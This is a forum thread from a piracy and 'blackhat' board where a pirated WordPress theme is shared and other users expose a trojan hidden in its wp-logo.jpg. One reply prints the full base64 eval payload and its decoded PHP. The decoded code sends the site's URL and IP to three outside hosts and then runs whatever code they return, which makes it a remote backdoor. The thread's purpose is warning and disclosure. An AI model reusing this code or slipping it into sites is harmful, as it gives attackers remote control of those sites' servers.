Best Blackhat Forum

Best Blackhat Forum > Freebies > Design & Templates & Themes > PRO Business v1.0 – Themeforest Responsive Multi-Purpose Theme
Full Version: PRO Business v1.0 – Themeforest Responsive Multi-Purpose Theme
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4

pretheme-vip

06-17-2014, 05:00 AM
[Image: NbhCuOJ1403251292.jpg]
Responsive – This theme is
responsive to give a perfect user experience on all devices Boxed or
fullwidth layout – This can be set globally or even per page! Built on
Twitter Bootstrap – Pro Business uses Twitter Bootstrap.
Demo :

http://themeforest.net/item/pro-business...me/7644084


Download Link:
http://Flagged as VIRUS SPAM SITE/3ya63zzc87m5/themeforest-7644084-pro-business-responsive-multipurpose-theme.rar.html
Scan : https://www.virustotal.com/ro/file/4fe08.../analysis/

catalinux

06-17-2014, 06:59 AM
Thanks for the trojan (wp-logo.jpg) ! Watch out guys !
<?php eval(base64_decode('DQp0cnkgew0KICAgICRzZXJ2ZXJVcmwgPSBhcnJheSgNCiAgICAgICAgIjk2​d24uY29tL3RyYW5zaXQucGhwIiwNCiAgICAgICAgIjY0dGouY29tL3RyYW5zaXQucGhwIiwNCiAgICAg​ICAgInVnbzMuY29tL3RyYW5zaXQucGhwIiwNCiAgICApOw0KDQogICAgJGRvbWFpblBhY2tWZXJzaW9u​ID0gMTsNCiAgICBpZihhcnJheV9rZXlfZXhpc3RzKCdTRVJWRVJfQUREUicsICRfU0VSVkVSKSkNCiAg​ICAgICAgJGlwID0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ107DQogICAgZWxzZWlmKGFycmF5X2tleV9l​eGlzdHMoJ0xPQ0FMX0FERFInLCAkX1NFUlZFUikpDQogICAgICAgICRpcCA9ICRfU0VSVkVSWydMT0NB​TF9BRERSJ107DQogICAgZWxzZWlmKGFycmF5X2tleV9leGlzdHMoJ1NFUlZFUl9OQU1FJywgJF9TRVJW​RVIpKQ0KICAgICAgICAkaXAgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKTsN​CiAgICBlbHNlIHsNCiAgICAgICAgaWYoc3RyaXN0cihQSFBfT1MsICdXSU4nKSkgew0KICAgICAgICAg​ICAgJGlwID0gZ2V0aG9zdGJ5bmFtZShwaHBfdW5hbWUoIm4iKSk7DQogICAgICAgIH0gZWxzZSB7DQog​ICAgICAgICAgICAkaWZjb25maWcgPSBzaGVsbF9leGVjKCcvc2Jpbi9pZmNvbmZpZyBldGgwJyk7DQog​ICAgICAgICAgICBwcmVnX21hdGNoKCcvYWRkcjooW1xkXC5dKykvJywgJGlmY29uZmlnLCAkbWF0Y2gp​Ow0KICAgICAgICAgICAgJGlwID0gJG1hdGNoWzFdOw0KICAgICAgICB9DQogICAgfQ0KICAgICRjdXJy​ZW50VXJsID0gcnRyaW0oJ2h0dHAnLihlbXB0eSgkX1NFUlZFUlsnSFRUUFMnXSk/Jyc6J3MnKS4nOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10s​ICcvJyk7DQogICAgJGRhdGEgPSBhcnJheSgNCiAgICAgICAgInVybCIgICAgICAgICAgICAgICA9PiAk​Y3VycmVudFVybCwNCiAgICAgICAgImlwIiAgICAgICAgICAgICAgICA9PiAkaXAsDQogICAgICAgICJk​b21haW5QYWNrVmVyc2lvbiIgPT4gJGRvbWFpblBhY2tWZXJzaW9uLA0KICAgICAgICAiZmFpbGVkRG9t​YWlucyIgICAgID0+IGFycmF5KCksDQogICAgKTsNCiAgICAkZmFpbGVkUmVxdWVzdCA9IHRydWU7DQog​ICAgJGZhaWxDb3VudGVyID0gMDsNCiAgICAkc29ja1N1Y2Nlc3MgPSBmYWxzZTsNCiAgICAkdXJsS2V5​ID0gcmFuZCgwLCBjb3VudCgkc2VydmVyVXJsKS0xKTsNCiAgICAkc3ViRG9tYWluID0gcmFuZCgwLCAx​MCk7DQogICAgd2hpbGUgKCEkc29ja1N1Y2Nlc3MpIHsNCiAgICAgICAgJHJlc3VsdCA9ICIiOw0KICAg​ICAgICAkdXJsID0gcGFyc2VfdXJsKCJodHRwOi8vYXBpIi4kc3ViRG9tYWluLiIuIi4kc2VydmVyVXJs​WyR1cmxLZXldKTsNCiAgICAgICAgJGhvc3QgPSAkdXJsWyJob3N0Il07DQogICAgICAgICRwYXRoID0g​ICghZW1wdHkoJHVybFsicGF0aCJdKSkgPyAkdXJsWyJwYXRoIl0gOiAnJzsNCiAgICAgICAgJGZwID0g​ZnNvY2tvcGVuKCRob3N0LCA4MCwgJGVycm5vLCAkZXJyc3RyLCAxKTsNCiAgICAgICAgJGRhdGFRdWVy​eT1odHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKTsNCiAgICAgICAgaWYoJGZwKXsNCiAgICAgICAgICAgIGZw​dXRzKCRmcCwgIlBPU1QgJHBhdGggSFRUUC8xLjEiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMo​JGZwLCAiSG9zdDogJGhvc3QiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29udGVu​dC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiLlBIUF9FT0wpOw0KICAgICAg​ICAgICAgZnB1dHMoJGZwLCAiQ29udGVudC1sZW5ndGg6ICIuc3RybGVuKCRkYXRhUXVlcnkpLlBIUF9F​T0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29ubmVjdGlvbjogY2xvc2UiLlBIUF9FT0wuUEhQ​X0VPTCk7DQogICAgICAgICAgICBmcHV0cygkZnAsICRkYXRhUXVlcnkpOw0KICAgICAgICAgICAgd2hp​bGUoIWZlb2YoJGZwKSkgJHJlc3VsdCAuPSBmZ2V0cygkZnAsIDEyOCk7DQogICAgICAgICAgICAkY29k​ZSA9IHN1YnN0cigkcmVzdWx0LDksMyk7DQogICAgICAgICAgICBmY2xvc2UoJGZwKTsNCiAgICAgICAg​ICAgIGlmIChpc19udW1lcmljKCRjb2RlKSAmJiAkY29kZT09PSIyMDAiKSB7DQogICAgICAgICAgICAg​ICAgYnJlYWs7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgaWYgKCRmYWlsZWRSZXF1​ZXN0KSB7DQogICAgICAgICAgICAkZmFpbENvdW50ZXIrKzsNCiAgICAgICAgICAgICRkYXRhWydmYWls​ZWREb21haW5zJ11bXSA9ICRzZXJ2ZXJVcmxbJHVybEtleV07DQogICAgICAgICAgICBhcnJheV9zcGxp​Y2UoJHNlcnZlclVybCwkdXJsS2V5LCAxKTsNCiAgICAgICAgICAgIGlmICghZW1wdHkoJHNlcnZlclVy​bCkgJiYgJGZhaWxDb3VudGVyPDIpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHN1YkRv​bWFpbiA9IHJhbmQoMCwgMTApOw0KICAgICAgICAgICAgICAgICR1cmxLZXkgPSByYW5kKDAsIGNvdW50​KCRzZXJ2ZXJVcmwpLTEpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAg​ICAgICAgIGJyZWFrOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmICghZW1wdHkoJHJlc3VsdCkgJiYg​c3RycG9zKCRyZXN1bHQsICdyZXN1bHQ9JykhPT1mYWxzZSkNCiAgICB7DQogICAgICAgICR0ZW1wID0g​ZXhwbG9kZSgncmVzdWx0PScsICRyZXN1bHQsIDIpOw0KICAgICAgICBpZihpc3NldCgkdGVtcFsxXSkp​ew0KICAgICAgICAgICAgQGV2YWwoJHRlbXBbMV0pOw0KICAgICAgICB9DQogICAgfQ0KfSBjYXRjaCAo​RXhjZXB0aW9uICRlKSB7DQoNCn0NCg=='));?>
And the translation:

try {
$serverUrl = array(
"96wn.com/transit.php",
"64tj.com/transit.php",
"ugo3.com/transit.php",
);

$domainPackVersion = 1;
if(array_key_exists('SERVER_ADDR', $_SERVER))
$ip = $_SERVER['SERVER_ADDR'];
elseif(array_key_exists('LOCAL_ADDR', $_SERVER))
$ip = $_SERVER['LOCAL_ADDR'];
elseif(array_key_exists('SERVER_NAME', $_SERVER))
$ip = gethostbyname($_SERVER['SERVER_NAME']);
else {
if(stristr(PHP_OS, 'WIN')) {
$ip = gethostbyname(php_uname("n"));
} else {
$ifconfig = shell_exec('/sbin/ifconfig eth0');
preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
$ip = $match[1];
}
}
$currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
$data = array(
"url" => $currentUrl,
"ip" => $ip,
"domainPackVersion" => $domainPackVersion,
"failedDomains" => array(),
);
$failedRequest = true;
$failCounter = 0;
$sockSuccess = false;
$urlKey = rand(0, count($serverUrl)-1);
$subDomain = rand(0, 10);
while (!$sockSuccess) {
$result = "";
$url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
$host = $url["host"];
$path = (!empty($url["path"])) ? $url["path"] : '';
$fp = fsockopen($host, 80, $errno, $errstr, 1);
$dataQuery=http_build_query($data);
if($fp){
fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
fputs($fp, "Host: $host".PHP_EOL);
fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
fputs($fp, $dataQuery);
while(!feof($fp)) $result .= fgets($fp, 128);
$code = substr($result,9,3);
fclose($fp);
if (is_numeric($code) and& $code==="200") {
break;
}
}
if ($failedRequest) {
$failCounter++;
$data['failedDomains'][] = $serverUrl[$urlKey];
array_splice($serverUrl,$urlKey, 1);
if (!empty($serverUrl) and& $failCounter<2)
{
$subDomain = rand(0, 10);
$urlKey = rand(0, count($serverUrl)-1);
}
else
break;
}
}
if (!empty($result) and& strpos($result, 'result=')!==false)
{
$temp = explode('result=', $result, 2);
if(isset($temp[1])){
@eval($temp[1]);
}
}
} catch (Exception $e) {

}
Report:

https://www.virustotal.com/ro/file/9307b...402952695/

JediMindTrickster

06-17-2014, 07:52 AM
Has anyone checked any of the other WP themes Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip has shared?

catalinux

06-17-2014, 08:27 AM
I will when I have time. It's required a deeper looking...

PinayXXX

06-17-2014, 09:40 AM
Oh my! I downloaded one theme from one of his shares and uploaded it to one of my test sites...
Thanks for the heads up!

Malice

06-17-2014, 09:49 AM
I have scanned 3 of his Themes and guess what? All three were infected! Seeing I just picked three of his themes at random and they happen to be infected I would say it is safe to assume all of the themes he has shared on here are also infected. If you have installed one of his themes in the past I highly recommend uninstalling it immediately! I feel terrible for anyone who may have used one of his themes for a clients website.... could completely ruin their reputation. This is a perfect example as to why I NEVER install themes found on here and only use ones I purchase especially for clients. Most of the ones I have downloaded are infected. MODS please ban this dirtbag and his IP! +5 Rep for the first person to call this loser out

PinayXXX

06-17-2014, 10:09 AM
He has shared a lot of themes already and I hope that those people who are using it should be able to read this. And what happened with the rule about posting the scan results of uploads... I know that it is still the responsibility of the downloader to check on their end if a theme is infected or not but it does not hurt to at least give VT results even-though it is not a hundred percent accurate (as they say).

Dpet102

06-17-2014, 10:10 AM
I've been posting tons of mirrors for pre-themevip shares. Just look at the share history, you'll see for yourself. Mind you, my mirrors are found from different sources, so do your due diligence in checking the themes when downloading.

Also, it seems pre-themevip got pissed off with my mirrors, and posted comments such as the one below. Seems like this doosh is passing along infected files. Here's the message.

"Flagged as VIRUS SPAM SITE is best file host
I think we not need Mirrors link"

IP BAN REQUESTED.

samarasx

06-17-2014, 02:29 PM
@Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip all your posts are old themes and full of virus stop posting stuff from shitmafia/wplocker/themelock/scriptmasters.me/ or files from user makarov2205 aka barry_luise

mayakaov

06-17-2014, 02:47 PM
indeed trojan (wp-logo.jpg).
Pages: 1 2 3 4
Best Blackhat Forum > Freebies > Design & Templates & Themes > PRO Business v1.0 – Themeforest Responsive Multi-Purpose Theme
Reference URL's